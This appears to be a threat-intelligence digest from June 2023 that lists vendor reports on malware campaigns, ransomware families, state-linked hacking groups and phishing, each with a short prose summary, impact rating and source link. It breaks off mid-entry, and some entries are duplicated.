https://securityintelligence.com/posts/trickbot-conti-crypters-where-are-they-now/
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Email_Spam_using_Modiloader_Attachments
- Date of Scan:
- 2023-06-26
- Impact:
- LOW
- Summary:
- Researchers from SANS analyzed two quarantined emails that had different text but the same attachment.
Source:
https://isc.sans.edu/diary/Email+Spam+with+Attachment+Modiloader/29978/
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Word_Document_with_Online_Template_Attached
- Date of Scan:
- 2023-06-26
- Impact:
- LOW
- Summary:
- Researchers from SANS analyzed a Word document that behaves like a dropper: it uses a remote Word template and makes an HTTP request to an external website.
Source:
https://isc.sans.edu/diary/Word+Document+with+an+Online+Attached+Template/29976/
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Qakbot_Distributing_Tag_via_Obama_Series
- Date of Scan:
- 2023-06-24
- Impact:
- LOW
- Summary:
- Qakbot using the Obama-series distribution tag has been active this week on Tuesday 2023-06-20 (obama269), Wednesday 2023-06-21 (obama270), and Thursday 2023-06-22 (obama271).
Source:
https://isc.sans.edu/diary/Qakbot+Qbot+activity+obama271+distribution+tag/29968/
—
- Intel Source:
- Deep Instinct
- Intel Name:
- Powerful_JavaScript_Dropper_PindOS_Spreading_Bumblebee_and_IcedID_Malware
- Date of Scan:
- 2023-06-24
- Impact:
- MEDIUM
- Summary:
- Deep Instinct researchers have observed a new strain of JavaScript dropper which is delivering next-stage payloads like Bumblebee and IcedID.
Source:
https://www.deepinstinct.com/blog/pindos-new-javascript-dropper-delivering-bumblebee-and-icedid
—
- Intel Source:
- TrendMicro
- Intel Name:
- An_Overview_of_Trigona_Ransomware_Various_Versions
- Date of Scan:
- 2023-06-23
- Impact:
- LOW
- Summary:
- The Trigona ransomware is a relatively new ransomware family that began activities around late October 2022 — although samples of it existed as early as June 2022. Since then, Trigona’s operators have remained highly active, and in fact, have been continuously updating their ransomware binaries.
Source:
https://www.trendmicro.com/en_us/research/23/f/an-overview-of-the-trigona-ransomware.html
—
- Intel Source:
- Checkpoint
- Intel Name:
- Hackers_Using_USB_Driven_Self_Propagating_Malware_to_Attack_the_Camaro_Dragon
- Date of Scan:
- 2023-06-23
- Impact:
- MEDIUM
- Summary:
- Checkpoint researchers have identified that the Chinese cyber espionage actor known as Camaro Dragon is leveraging a new strain of self-propagating malware that spreads through compromised USB drives.
—
- Intel Source:
- KrebsOnSecurity
- Intel Name:
- The_Service_in_question_rents_email_addresses
- Date of Scan:
- 2023-06-23
- Impact:
- LOW
- Summary:
- The service in question in the KrebsOnSecurity blog post is kopeechka[.]store, a kind of unidirectional email confirmation-as-a-service that lures you to “save your time and money for successfully registering multiple accounts.” The service offers to cut the costs associated with large-scale spam and account creation campaigns by paying people to sell their email account credentials and letting customers temporarily rent access to a vast pool of established accounts at major providers.
—
- Intel Source:
- Zscaler
- Intel Name:
- RedEnergy_Stealer_as_a_Ransomware_Attacks
- Date of Scan:
- 2023-06-23
- Impact:
- LOW
- Summary:
- Zscaler researchers have discovered a new malware variant, RedEnergy stealer that fits into the hybrid Stealer-as-a-Ransomware threat category. RedEnergy stealer uses a fake update campaign to target multiple industry verticals and possesses the ability to steal information from various browsers, enabling the exfiltration of sensitive data, while also incorporating different modules for carrying out ransomware activities.
—
- Intel Source:
- Cyble
- Intel Name:
- New_Infection_Strategy_Implemented_by_Mallox_Ransomware
- Date of Scan:
- 2023-06-23
- Impact:
- LOW
- Summary:
- Cyble researchers have observed a new variation of the Mallox ransomware that now appends the file extension .malox to the encrypted files, whereas previously it used the .mallox extension. This ransomware binary is deployed using BatLoader, which is similar to the one previously reported spreading RATs and stealers.
Source:
https://blog.cyble.com/2023/06/22/mallox-ransomware-implements-new-infection-strategy/
—
- Intel Source:
- PaloAlto
- Intel Name:
- Multiple_IoT_Exploits_Used_in_Latest_Mirai_Campaign
- Date of Scan:
- 2023-06-23
- Impact:
- LOW
- Summary:
- Paloalto researchers have observed threat actors leveraging several IoT vulnerabilities to spread a variant of the Mirai botnet.
Source:
https://unit42.paloaltonetworks.com/mirai-variant-targets-iot-exploits/
—
- Intel Source:
- Cyble
- Intel Name:
- New_Infection_Strategy_of_Mallox_Ransomware
- Date of Scan:
- 2023-06-23
- Impact:
- LOW
- Summary:
- Two years ago, a new ransomware known as “TargetCompany” appeared and got a lot of attention due to its unique method of appending the name of the targeted company as a file extension. This ransomware variant was also noticed using a “.mallox” extension on encrypted files, linking it to its previous identification as “Mallox”. Last year, Cyble Research analysts also observed a significant spike in Mallox ransomware samples. Cyble analysts discovered a new variation of the Mallox ransomware that now appends the file extension “.malox” to the encrypted files, whereas previously it used the “.mallox” extension. This ransomware binary is deployed using BatLoader, which is similar to the one previously reported spreading RATs and stealers.
Source:
https://blog.cyble.com/2023/06/22/mallox-ransomware-implements-new-infection-strategy/
—
- Intel Source:
- Microsoft
- Intel Name:
- Cryptocurrency_Mining_Campaigns_Targeting_Linux_and_IoT_Devices
- Date of Scan:
- 2023-06-23
- Impact:
- LOW
- Summary:
- Microsoft researchers have identified that Internet-facing Linux systems and Internet of Things (IoT) devices are being targeted as part of a new campaign designed to illicitly mine cryptocurrency.
—
- Intel Source:
- Securonix Threat Labs
- Intel Name:
- New_MULTI_STORM_Attack_Campaign_by_Python_Loader
- Date of Scan:
- 2023-06-22
- Impact:
- MEDIUM
- Summary:
- An interesting phishing campaign was recently analyzed by the Securonix Threat Research Team. The attack kicks off when the user clicks on a heavily obfuscated JavaScript file contained in a password protected zip file. The attack chain ends with the victim machine infected with multiple unique RAT (remote access trojan) malware instances, such as Warzone RAT and Quasar RAT. Both are used for command and control during different stages of the infection chain.
—
- Intel Source:
- Fortinet
- Intel Name:
- Condi_DDoS_Botnet_Spreading_Through_TP_Link_Vulnerability
- Date of Scan:
- 2023-06-22
- Impact:
- LOW
- Summary:
- Fortinet researchers have observed that a new DDoS-as-a-Service botnet called “Condi” emerged in May 2023, exploiting a vulnerability in TP-Link Archer AX21 (AX1800) Wi-Fi routers to build an army of bots to conduct attacks.
Source:
https://www.fortinet.com/blog/threat-research/condi-ddos-botnet-spreads-via-tp-links-cve-2023-1389
—
- Intel Source:
- ASEC
- Intel Name:
- The_Examination_of_Ransomware_With_BAT_File_Extension_Attacking_MS_SQL_Servers
- Date of Scan:
- 2023-06-22
- Impact:
- LOW
- Summary:
- ASEC researchers have discovered the Mallox ransomware with the BAT file extension being distributed to poorly managed MS-SQL servers. Extensions of files distributed to poorly managed MS-SQL servers include not only EXE but also BAT, which is a fileless format. The files distributed with the BAT file extension that have been discovered so far are Remcos RAT and Mallox.
—
- Intel Source:
- PaloAlto
- Intel Name:
- Evaluation_of_Threat_Group_Muddled_Libra
- Date of Scan:
- 2023-06-22
- Impact:
- LOW
- Summary:
- PaloAlto researchers have identified that a new threat group dubbed “Muddled Libra” is targeting large outsourcing firms with multi-layered, persistent attacks that start with smishing and end with data theft. The group is also using the infrastructure that it compromises in downstream attacks on victims’ customers.
—
- Intel Source:
- ASEC
- Intel Name:
- RedEyes_Group_Wiretapping_Individuals
- Date of Scan:
- 2023-06-22
- Impact:
- LOW
- Summary:
- ASEC researchers have discovered that RedEyes (APT37), a state-sponsored APT group, is targeting individuals. The group recently used an infostealer with wiretapping capabilities and a GoLang backdoor. Spear phishing emails were used for initial access, and the Ably platform for command and control. Privilege escalation techniques were employed, and an infostealer named FadeStealer stole data and wiretapped microphones.
—
- Intel Source:
- ASEC
- Intel Name:
- Kimsuky_Distributing_CHM_Malware
- Date of Scan:
- 2023-06-22
- Impact:
- LOW
- Summary:
- ASEC researchers have continuously tracked the Kimsuky group’s APT attacks. While the Kimsuky group often used document files for malware distribution, there have been many recent cases where CHM files were used in distribution. Also, unlike in the past when the document files contained North Korea-related topics, the group is now attempting to attack using a variety of subjects.
—
- Intel Source:
- CERT-UA
- Intel Name:
- APT28_Group_Leveraging_Three_Roundcube_Exploits
- Date of Scan:
- 2023-06-22
- Impact:
- LOW
- Summary:
- CERT-UA researchers have discovered that APT28 utilized three exploits targeting Roundcube (CVE-2020-35730, CVE-2021-44026, CVE-2020-12641) during a recent espionage campaign against a Ukrainian government organization. The attack involved malicious emails containing exploit code and JavaScript files for exfiltration.
—
- Intel Source:
- Symantec
- Intel Name:
- Chinese_Hacking_Group_Flea_Targeting_American_Ministries
- Date of Scan:
- 2023-06-22
- Impact:
- MEDIUM
- Summary:
- Symantec researchers have identified that a Chinese state-sponsored actor named Flea is targeting foreign affairs ministries in the Americas as part of a recent campaign that spanned from late 2022 to early 2023.
—
- Intel Source:
- Bitdefender
- Intel Name:
- Hackers_Running_an_Active_Cryptojacking_Campaign
- Date of Scan:
- 2023-06-21
- Impact:
- LOW
- Summary:
- Bitdefender security researchers have discovered a threat group likely based in Romania that’s been active since at least 2020. They’ve been targeting Linux-based machines with weak SSH credentials, mainly to deploy Monero mining malware, but their toolbox allows for other kinds of attacks.
—
- Intel Source:
- ASEC
- Intel Name:
- ASEC_Weekly_Phishing_Email_analysis_June_4_10_2023
- Date of Scan:
- 2023-06-21
- Impact:
- LOW
- Summary:
- The ASEC analysis team keeps monitoring phishing email threats with their automatic sample analysis system (RAPIT) and honeypot. Their post covers the cases of phishing email distribution observed during the week from June 4, 2023 to June 10, 2023 and provides statistical information on each type.
—
- Intel Source:
- ASEC
- Intel Name:
- Disguised_malware_as_a_security_update_installer
- Date of Scan:
- 2023-06-21
- Impact:
- LOW
- Summary:
- AhnLab recently discovered the attack of a hacking group that is supported by a certain government. The discovered malware disguised itself as a security update installer and was developed using the Inno Setup software.
—
- Intel Source:
- Esentire
- Intel Name:
- Aurora_Stealer_malware_analysis
- Date of Scan:
- 2023-06-21
- Impact:
- LOW
- Summary:
- The eSentire post discusses the Aurora Stealer malware targeting the manufacturing industry through fake downloads distributed via Google Ads. The malware gathers sensitive data, has a pricing plan, and is written in the Go programming language. The post also provides indicators of compromise and recommendations for protection against the malware.
Source:
https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-aurora-stealer
—
- Intel Source:
- Checkpoint
- Intel Name:
- Attackers_Abusing_Legitimate_Services_For_Credential_Theft
- Date of Scan:
- 2023-06-21
- Impact:
- LOW
- Summary:
- Check Point researchers have detected an ongoing phishing campaign that uses legitimate services for credential harvesting and data exfiltration in order to evade detection.
—
- Intel Source:
- Fortinet
- Intel Name:
- New_Ransomware_Variant_Big_Head
- Date of Scan:
- 2023-06-21
- Impact:
- LOW
- Summary:
- FortiGuard Labs have recently come across a new ransomware variant called Big Head, which came out in May 2023. Although there are at least three variants of Big Head ransomware, all are designed to encrypt files on victims’ machines to extort money, like other ransomware variants.
Source:
https://www.fortinet.com/blog/threat-research/fortiguard-labs-ransomware-roundup-big-head
—
- Intel Source:
- Cyble
- Intel Name:
- New_Malware_Campaign_Targeting_LetsVPN_Users
- Date of Scan:
- 2023-06-21
- Impact:
- LOW
- Summary:
- Cyble researchers have discovered the existence of numerous counterfeit LetsVPN websites while conducting a routine threat-hunting exercise. These fraudulent sites share a common user interface and are deliberately designed to distribute malware, masquerading as the genuine LetsVPN application.
Source:
https://blog.cyble.com/2023/06/16/new-malware-campaign-targets-letsvpn-users/
—
- Intel Source:
- eSentire
- Intel Name:
- The_Analysis_of_Resident_Campaign
- Date of Scan:
- 2023-06-21
- Impact:
- LOW
- Summary:
- eSentire researchers have observed the resurgence of what they believe to be a malicious campaign targeting manufacturing, commercial, and healthcare organizations.
Source:
https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-resident-campaign
—
- Intel Source:
- Esentire
- Intel Name:
- DcRAT_a_clone_of_AsyncRAT
- Date of Scan:
- 2023-06-21
- Impact:
- LOW
- Summary:
- In May 2023, eSentire identified DcRAT, a clone of AsyncRAT, at a consumer services customer. DcRAT is a remote access tool with info-stealing and ransomware capabilities. The malware is actively distributed using explicit lures for OnlyFans pages and other adult content.
—
- Intel Source:
- Team Cymru
- Intel Name:
- The_Aesi_Return_with_Darth_Vidar
- Date of Scan:
- 2023-06-21
- Impact:
- LOW
- Summary:
- Researchers from Team-Cymru have observed that Vidar threat actors continue to rotate their backend IP infrastructure, favoring providers in Moldova and Russia.
Source:
https://www.team-cymru.com/post/darth-vidar-the-aesir-strike-back
—
- Intel Source:
- Bitdefender
- Intel Name:
- The_Aesir_Return_with_Darth_Vidar
- Date of Scan:
- 2023-06-20
- Impact:
- LOW
- Summary:
- Bitdefender researchers have described the behaviors observed in a recent incident they investigated, in which a presumably custom malware tracked by researchers as the Logutil backdoor was deployed. The operation was active for more than a year with the end goal of compromising credentials and exfiltrating data.
—
- Intel Source:
- PaloAlto
- Intel Name:
- Hackers_Targeting_Middle_Eastern_and_African_Governments_with_Advanced_Techniques
- Date of Scan:
- 2023-06-20
- Impact:
- MEDIUM
- Summary:
- PaloAlto researchers have identified that Governmental entities in the Middle East and Africa have been at the receiving end of sustained cyber-espionage attacks that leverage never-before-seen and rare credential theft and Exchange email exfiltration techniques.
—
- Intel Source:
- ASEC
- Intel Name:
- RecordBreaker_Infostealer_Disguised_as_a_Dot_NET_Installer
- Date of Scan:
- 2023-06-20
- Impact:
- LOW
- Summary:
- ASEC researchers have observed that the encrypted malware file is downloaded from the threat actor’s server and executed. The malware in this instance is the RecordBreaker (Raccoon Stealer V2) Infostealer.
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Malware_Delivering_Through_Dot_inf_File
- Date of Scan:
- 2023-06-20
- Impact:
- LOW
- Summary:
- Researchers from SANS have analyzed a .inf file and observed that it delivers malware.
—
- Intel Source:
- ASEC
- Intel Name:
- Tsunami_DDoS_Malware_Distributing_to_Linux_SSH_Servers
- Date of Scan:
- 2023-06-20
- Impact:
- MEDIUM
- Summary:
- ASEC researchers have discovered an attack campaign that consists of the Tsunami DDoS Bot being installed on inadequately managed Linux SSH servers. Not only did the threat actor install Tsunami, but they also installed various other malware such as ShellBot, XMRig CoinMiner, and Log Cleaner.
—
- Intel Source:
- ISC.SANS
- Intel Name:
- RAT_Delivering_Through_VBS
- Date of Scan:
- 2023-06-19
- Impact:
- LOW
- Summary:
- Researchers from SANS have observed a RAT being delivered via VBS.
—
- Intel Source:
- CERT-UA
- Intel Name:
- Cyberattacks_Against_Users_of_UKR_NET_Service
- Date of Scan:
- 2023-06-19
- Impact:
- MEDIUM
- Summary:
- CERT-UA researchers have identified that an e-mail was received from a participant of the information exchange with the subject “Suspicious activity observed @UKR.NET” and an attachment in the form of a PDF file, “Security warning.pdf”, sent apparently on behalf of UKR.NET technical support. The PDF document contains a link to a fraudulent web resource that imitates the web page of the mail service.
—
- Intel Source:
- CERT-UA
- Intel Name:
- GhostWriter_Group_Targeting_State_Organization_of_Ukraine
- Date of Scan:
- 2023-06-19
- Impact:
- MEDIUM
- Summary:
- CERT-UA researchers have discovered the PPT document “daewdfq342r.ppt”, which contains a macro and a thumbnail image with the emblem of the National Defense University of Ukraine named after Ivan Chernyakhivskyi.
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Formbook_From_Possible_ModiLoader
- Date of Scan:
- 2023-06-19
- Impact:
- LOW
- Summary:
- Researchers from SANS have analyzed the recent Formbook samples and came across an example that kicks off with an Excel file exploiting CVE-2017-11882 to use what seems like ModiLoader (also known as DBatLoader).
—
- Intel Source:
- Cyfirma
- Intel Name:
- An_Evolving_Stealer_Called_Mystic
- Date of Scan:
- 2023-06-18
- Impact:
- LOW
- Summary:
- CYFIRMA's research team recently discovered an information stealer called Mystic Stealer being promoted on an underground forum, with the threat actor utilizing a Telegram channel for their operations.
Source:
https://www.cyfirma.com/outofband/mystic-stealer-evolving-stealth-malware/
—
- Intel Source:
- Cofense
- Intel Name:
- MultiStage_Phishing_Attac_Targeted_Xneelo_Users
- Date of Scan:
- 2023-06-17
- Impact:
- LOW
- Summary:
- Cofense researchers have observed a multi-stage phishing campaign targeting Xneelo customers, involving a fake KonsoleH login page to obtain login details, credit card information, and SMS 2FA codes.
Source:
https://cofense.com/blog/xneelo-users-targeted-in-a-multi-stage-phishing-attack/
—
- Intel Source:
- Sygnia
- Intel Name:
- Analazying_a_global_adversary_in_the_middle_campaign
- Date of Scan:
- 2023-06-17
- Impact:
- LOW
- Summary:
- At the beginning of this year, Sygnia’s IR team investigated and analyzed a Business Email Compromise (BEC) attack against one of its clients. The threat actor gained initial access to one of the victim employees’ accounts and executed an ‘Adversary In The Middle’ attack to bypass Office365 authentication and gain persistent access to that account. After getting access, the threat actor exfiltrated data from the compromised account and used the access to spread phishing attacks to other employees of the victim along with several external targeted organizations.
Source:
https://blog.sygnia.co/cracking-global-phishing-campaign-using-threat-intelligence-toolkit
—
- Intel Source:
- Stairwell
- Intel Name:
- Chinese_Hackers_Using_DNS_Over_HTTPS_For_Linux_Malware_Communication
- Date of Scan:
- 2023-06-17
- Impact:
- LOW
- Summary:
- Researchers from Stairwell have observed the Chinese threat group ‘ChamelGang’ infecting Linux devices with a previously unknown implant named ‘ChamelDoH,’ allowing DNS-over-HTTPS communications with attackers’ servers.
Source:
https://stairwell.com/news/chamelgang-and-chameldoh-a-dns-over-https-implant/
—
- Intel Source:
- Checkmarx
- Intel Name:
- Supply_Chain_Attackers_Exploiting_New_Technique
- Date of Scan:
- 2023-06-17
- Impact:
- LOW
- Summary:
- Checkmarx researchers have identified a new attack technique for hijacking S3 buckets by Supply Chain Attackers.
—
- Intel Source:
- CADO Security
- Intel Name:
- An_Emerging_Romanian_Threat_Actor_Named_Diicot
- Date of Scan:
- 2023-06-17
- Impact:
- LOW
- Summary:
- Cado security researchers have identified an interesting attack pattern that could be attributed to the threat actor Diicot (formerly, “Mexals”).
Source:
https://www.cadosecurity.com/tracking-diicot-an-emerging-romanian-threat-actor/
—
- Intel Source:
- Symantec
- Intel Name:
- Long_Running_Shuckworm_Intrusions_Against_Ukrainian_Organizations
- Date of Scan:
- 2023-06-17
- Impact:
- LOW
- Summary:
- Symantec researchers have identified that the Russian threat actor known as Shuckworm has continued its cyber assault spree against Ukrainian entities in a bid to steal sensitive information from compromised environments.
—
- Intel Source:
- Netskope
- Intel Name:
- Netskope_DL_based_Inline_Phishing_Detection
- Date of Scan:
- 2023-06-16
- Impact:
- LOW
- Summary:
- Netskope Threat Labs note that ChatGPT facilitates natural language processing and communication, while Netskope’s Inline Phishing Detection focuses on identifying and blocking phishing attacks in real time.
—
- Intel Source:
- HP Wolf Security
- Intel Name:
- A_New_ChromeLoader_Campaign_Named_Shampoo
- Date of Scan:
- 2023-06-16
- Impact:
- MEDIUM
- Summary:
- HP Wolf Security has detected a new malware campaign, “Shampoo”, utilizing a malicious ChromeLoader extension. It steals sensitive information, injects ads, and poses challenges for removal.
Source:
https://threatresearch.ext.hp.com/shampoo-a-new-chromeloader-campaign/
—
- Intel Source:
- ASEC
- Intel Name:
- Lazarus_group_exploiting_Korean_finance_security_solution_vulnerability
- Date of Scan:
- 2023-06-16
- Impact:
- LOW
- Summary:
- The ASEC team has observed the Lazarus threat group exploiting new vulnerabilities in VestCert and TCO!Stream. Update the affected software promptly to mitigate the risk, and strengthen security measures against advanced threats.
—
- Intel Source:
- Trellix
- Intel Name:
- Phishing_Attacks_Using_HTML_Attachments
- Date of Scan:
- 2023-06-16
- Impact:
- LOW
- Summary:
- Trellix researchers have identified that phishing attacks using HTML attachments are increasing rapidly, targeting global industries with obfuscation techniques and evasion methods, requiring heightened vigilance and strong email security measures.
—
- Intel Source:
- Microsoft
- Intel Name:
- Introducing_Cadet_Blizzard_as_a_Significant_New_Russian_Threat_Actor
- Date of Scan:
- 2023-06-15
- Impact:
- MEDIUM
- Summary:
- Microsoft researchers have updated details about techniques of a threat actor formerly tracked as DEV-0586—a distinct Russian state-sponsored threat actor that has now been elevated to the name Cadet Blizzard.
—
- Intel Source:
- Netskope
- Intel Name:
- The_risks_of_zip_and_mov_domains
- Date of Scan:
- 2023-06-14
- Impact:
- LOW
- Summary:
- Some time ago Google announced eight new top-level domains. Two of them (.zip and .mov) have been a concern because they are similar to well-known file extensions. The .zip and .mov TLDs themselves are not new, as they have been available since 2014. The main threat is that anyone can now own a .zip or .mov domain cheaply and use it for social engineering: attackers will be able to craft URLs that appear to be delivering ZIP and MOV files, but instead redirect victims to malicious websites.
Source:
https://www.netskope.com/blog/zip-and-mov-top-level-domain-abuse-one-month-after-being-made-public
—
- Intel Source:
- TrendMicro
- Intel Name:
- A_Look_into_Earth_Preta_Hidden_Working
- Date of Scan:
- 2023-06-14
- Impact:
- LOW
- Summary:
- TrendMicro researchers have discussed the more technical details of the most recent tools, techniques, and procedures (TTPs) leveraged by the Earth Preta APT group.
—
- Intel Source:
- Sygnia
- Intel Name:
- Analyzing_a_global_adversary_in_the_middle_campaign
- Date of Scan:
- 2023-06-14
- Impact:
- LOW
- Summary:
- At the beginning of this year, Sygnia’s IR team investigated and analyzed a Business Email Compromise (BEC) attack against one of its clients. The threat actor gained initial access to one of the victim employees’ accounts and executed an ‘Adversary In The Middle’ attack to bypass Office365 authentication and gain persistent access to that account. After getting access, the threat actor exfiltrated data from the compromised account and used the access to spread phishing attacks to other employees of the victim along with several external targeted organizations.
Source:
https://blog.sygnia.co/cracking-global-phishing-campaign-using-threat-intelligence-toolkit
—
- Intel Source:
- Dr.WEB
- Intel Name:
- Pirated_Windows_10_ISOs_Install_Clipper_Malware
- Date of Scan:
- 2023-06-14
- Impact:
- MEDIUM
- Summary:
- Dr.WEB researchers have identified that hackers are distributing Windows 10 using torrents that hide cryptocurrency hijackers in the EFI (Extensible Firmware Interface) partition to evade detection.
—
- Intel Source:
- Cyble
- Intel Name:
- WannaCry_Imitator_targets_Russian_Gaming_Community
- Date of Scan:
- 2023-06-14
- Impact:
- MEDIUM
- Summary:
- Cyble researchers recently observed phishing campaigns that use gaming sites as a distribution channel for various malware families. They discovered a phishing campaign targeting Russian-speaking gamers in order to distribute ransomware. The fake website offers a file that contains a legitimate game installer together with the ransomware. The ransomware uses the name “WannaCry 3.0” and the “wncry” file extension for encrypted files, although it is not an original variant of the WannaCry ransomware. It is a modified version of an open-source ransomware, “Crypter”, developed for Windows and written purely in Python.
—
- Intel Source:
- Trellix
- Intel Name:
- New_Golang_Based_Skuld_Malware
- Date of Scan:
- 2023-06-14
- Impact:
- MEDIUM
- Summary:
- Trellix researchers have identified a new Golang-based information stealer called Skuld that has compromised Windows systems across Europe, Southeast Asia, and the US.
—
- Intel Source:
- Sophos
- Intel Name:
- Diving_Deep_into_Pikabot_Cyber_Threat
- Date of Scan:
- 2023-06-13
- Impact:
- LOW
- Summary:
- Sophos researchers have analyzed the Pikabot malware. Pikabot is a modular trojan acting as a backdoor, allowing unauthorized remote access and executing diverse commands received from a command-and-control server. It has the potential for multi-staged attacks.
Source:
https://news.sophos.com/en-us/2023/06/12/deep-dive-into-the-pikabot-cyber-threat/
—
- Intel Source:
- Securelist
- Intel Name:
- Multistage_DoubleFinger_loads_GreetingGhoul_stealer
- Date of Scan:
- 2023-06-13
- Impact:
- LOW
- Summary:
- Securelist shared their analysis of the multi-stage DoubleFinger loader delivering a cryptocurrency stealer. DoubleFinger is deployed on the target machine when the victim opens a malicious PIF attachment in an email message, which executes the first of DoubleFinger’s loader stages.
Source:
https://securelist.com/doublefinger-loader-delivering-greetingghoul-cryptocurrency-stealer/109982/
—
- Intel Source:
- ASEC
- Intel Name:
- ASEC_Weekly_Phishing_Threats_analyses_May_28_June_3_20
- Date of Scan:
- 2023-06-13
- Impact:
- LOW
- Summary:
- The ASEC analysis team keeps monitoring phishing email threats with their system and honeypot. This article explains the distribution of phishing emails during the week from May 28th to June 3rd, 2023 and provides statistical information on each type.
—
- Intel Source:
- Elastic
- Intel Name:
- Hackers_Targeting_Vietnamese_Public_Companies_With_SPECTRALVIPER_Backdoor
- Date of Scan:
- 2023-06-12
- Impact:
- LOW
- Summary:
- Researchers from Elastic have identified an ongoing campaign that deploys a novel backdoor called SPECTRALVIPER which is targeting Vietnamese public companies. It is a heavily obfuscated, previously undisclosed, x64 backdoor that brings PE loading and injection, file upload and download, file and directory manipulation, and token impersonation capabilities.
Source:
https://www.elastic.co/security-labs/elastic-charms-spectralviper
—
- Intel Source:
- Cyble
- Intel Name:
- Darkrace_Ransomware_Resembles_LockBit_Ransomware
- Date of Scan:
- 2023-06-12
- Impact:
- LOW
- Summary:
- Cyble researchers have discovered a new ransomware named Darkrace which has similarities with Lockbit Ransomware. It is specifically targeting Windows operating systems and exhibits several similarities to the LockBit ransomware, including the deployment of batch files to terminate processes, the dropping of file icons, and the utilization of random encryption extensions.
Source:
https://blog.cyble.com/2023/06/08/unmasking-the-darkrace-ransomware-gang/
—
- Intel Source:
- Cyble
- Intel Name:
- Malicious_PyPI_Packages
- Date of Scan:
- 2023-06-12
- Impact:
- LOW
- Summary:
- Cyble Research and Intelligence Labs analysts have been actively tracking malicious Python packages and recently observed several different infostealers. One, dubbed KEKW, was spreading through multiple malicious Python packages; another was the Creal Stealer, an open-source stealer that has been extensively utilized by threat actors. Previously there was no evidence of Creal Stealer being propagated through Python packages, but Cyble researchers discovered several Python packages that were found to distribute it. Others, such as the TIKCOCK GRABBER, the Hazard Token Grabber, and the W4SP stealer, are information stealers that focus on extracting sensitive information from victims’ systems. Cyble’s analysis revealed that infostealers were the type of malware predominantly propagated through malicious Python packages. The presence of readily accessible code for information stealers on platforms like GitHub has empowered multiple threat actors to leverage this particular strain of malware in their campaigns.
Source:
https://blog.cyble.com/2023/06/09/over-45-thousand-users-fell-victim-to-malicious-pypi-packages/
—
- Intel Source:
- ISC. SANS
- Intel Name:
- Undetected_PowerShell_Backdoor
- Date of Scan:
- 2023-06-12
- Impact:
- LOW
- Summary:
- ISC.SANS researcher Xavier Mertens found a script that scored 0/59 on VT and provided details of his findings. The file was found with the name “Microsoft.PowerShell_profile.ps1”. The attacker likely selected that name because it is a familiar name used by Microsoft to manage PowerShell profiles.
—
- Intel Source:
- Securelist
- Intel Name:
- Satacom_malware_steals_cryptocurrency
- Date of Scan:
- 2023-06-12
- Impact:
- LOW
- Summary:
- Securelist shared their analysis of a recent malware distribution campaign related to the Satacom downloader. Satacom, also known as LegionLoader, is a renewed malware family that has been around since 2019. The main goal of the malware dropped by the Satacom downloader is to steal BTC from the victim’s account by performing web injections into targeted cryptocurrency websites. The malware tries to install an extension for Chromium-based web browsers, which later communicates with its C2 server, whose address is stored in BTC transaction data.
Source:
https://securelist.com/satacom-delivers-cryptocurrency-stealing-browser-extension/109807/
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Activity_of_DShield_Honeypot
- Date of Scan:
- 2023-06-12
- Impact:
- LOW
- Summary:
- Researchers from SANS have reviewed the DShield honeypot data stored during the previous month. Also of interest is how the activity varies from week to week.
Source:
https://isc.sans.edu/diary/DShield+Honeypot+Activity+for+May+2023/29932/
—
- Intel Source:
- Obsidian
- Intel Name:
- A_SaaS_ransomware_attack_against_a_Sharepoint_365
- Date of Scan:
- 2023-06-12
- Impact:
- LOW
- Summary:
- Obsidian’s Threat Research team has observed a SaaS ransomware attack against a company’s SharePoint Online (Microsoft 365) without the use of a compromised endpoint. Obsidian’s team and product were leveraged post-compromise to determine the finer details of the attack.
Source:
https://www.obsidiansecurity.com/blog/saas-ransomware-observed-sharepoint-microsoft-365/
—
- Intel Source:
- DFIR Report
- Intel Name:
- Truebot_Using_Cobalt_Strike_and_FlawedGrace
- Date of Scan:
- 2023-06-12
- Impact:
- LOW
- Summary:
- The DFIR Report researchers have identified that Truebot is being delivered through a Traffic Distribution System. This campaign, observed in May 2023, leveraged email as the initial delivery mechanism. After clicking the link in an email, the victim would be redirected through a series of URLs before being presented with a file download at the final landing page.
Source:
https://thedfirreport.com/2023/06/12/a-truly-graceful-wipe-out/
—
- Intel Source:
- Blackberry
- Intel Name:
- RomCom_Group_Targeting_Politicians_in_Ukraine_and_US_Based_Healthcare
- Date of Scan:
- 2023-06-09
- Impact:
- MEDIUM
- Summary:
- Blackberry researchers have observed RomCom targeting politicians in Ukraine who are working closely with Western countries, and a U.S.-based healthcare company providing humanitarian aid to the refugees fleeing from Ukraine and receiving medical assistance in the U.S.
Source:
https://blogs.blackberry.com/en/2023/06/romcom-resurfaces-targeting-ukraine
—
- Intel Source:
- Cofense
- Intel Name:
- Caffeine_phishing_domains_and_patterns_still_active_despite_store_closure
- Date of Scan:
- 2023-06-09
- Impact:
- LOW
- Summary:
- Cofense researchers have observed an ongoing and evolving credential phishing campaign specifically targeting Microsoft Office 365 credentials. The campaign involves the distribution of fraudulent emails that aim to deceive recipients and trick them into divulging their Office 365 login credentials.
—
- Intel Source:
- Welivesecurity
- Intel Name:
- The_Details_About_Asylum_Ambuscade_Cybercrime_Group
- Date of Scan:
- 2023-06-09
- Impact:
- LOW
- Summary:
- Researchers from Welivesecurity have analyzed the Asylum Ambuscade cybercrime group that has been performing cyberespionage operations on the side and provided details about the early 2022 espionage campaign and about multiple cybercrime campaigns in 2022 and 2023.
Source:
https://www.welivesecurity.com/2023/06/08/asylum-ambuscade-crimeware-or-cyberespionage/
—
- Intel Source:
- Checkpoint
- Intel Name:
- North_African_Espionage_Attacks_Using_Stealth_Soldier_Backdoors
- Date of Scan:
- 2023-06-09
- Impact:
- MEDIUM
- Summary:
- Check Point researchers have identified an ongoing operation against targets in North Africa involving a previously undisclosed multi-stage backdoor called Stealth Soldier. The malware Command and Control network is part of a larger set of infrastructure, used at least in part for spear-phishing campaigns against government entities.
—
- Intel Source:
- JPCERT
- Intel Name:
- GobRAT_malware_targeting_Linux_routers
- Date of Scan:
- 2023-06-09
- Impact:
- MEDIUM
- Summary:
